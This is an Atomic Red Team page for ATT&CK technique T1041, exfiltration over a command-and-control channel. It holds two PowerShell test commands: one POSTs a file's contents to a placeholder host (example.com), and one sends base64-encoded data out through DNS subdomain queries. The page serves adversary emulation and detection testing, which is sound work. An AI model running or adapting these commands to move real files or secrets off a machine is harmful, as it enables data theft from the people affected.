Skip to content
Atomic Red Team
atomics
T1041

T1041 - Exfiltration Over C2 Channel

Description from ATT&CK (opens in a new tab)

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

Atomic Tests


Atomic Test #1 - C2 Data Exfiltration

Exfiltrates a file present on the victim machine to the C2 server.

Supported Platforms: Windows

auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932

Inputs:

NameDescriptionTypeDefault Value
destination_urlDestination URL to post encoded data.stringexample.com
filepathThe file which is being exfiltrated to the C2 Server.path$env:TEMP\LineNumbers.txt

Attack Commands: Run with powershell!

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive


Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains

Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.

Supported Platforms: Windows

auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9

Inputs:

NameDescriptionTypeDefault Value
dns_serverDNS server IP address or domain name.urldns.example.com
exfiltrated_dataData to be exfiltrated.stringSecretDataToExfiltrate
chunk_sizeSize of each DNS query chunk (in characters).integer63

Attack Commands: Run with powershell!

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}
 
$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"
 
foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}